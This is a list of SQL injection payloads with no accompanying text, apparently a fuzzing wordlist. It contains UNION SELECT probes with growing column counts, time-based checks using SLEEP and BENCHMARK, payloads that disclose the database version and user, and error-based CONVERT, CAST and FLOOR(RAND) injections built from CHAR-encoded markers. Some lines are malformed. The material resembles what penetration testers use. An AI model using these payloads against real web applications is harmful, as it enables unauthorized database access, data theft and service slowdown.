UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 | |
UNION SELECT @@VERSION,SLEEP(5),"'3 | |
UNION SELECT @@VERSION,SLEEP(5),"'3'"# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),4# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29# | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30# | |
UNION ALL SELECT USER()-- | |
UNION ALL SELECT SLEEP(5)-- | |
UNION ALL SELECT USER(),SLEEP(5)-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5)-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A'))-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- | |
UNION ALL SELECT NULL-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))-- | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))-- | |
UNION ALL SELECT NULL# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))# | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))# | |
UNION ALL SELECT NULL | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107))) | |
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113))) | |
AND 5650=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5650=5650) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113))) | |
AND 3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3516=3516) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(113)) AS NUMERIC) | |
AND (SELECT 4523 FROM(SELECT COUNT(*),CONCAT(0x716a7a6a71,(SELECT (ELT(4523=4523,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) | |
UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+CHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113),NULL-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX' | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 | |
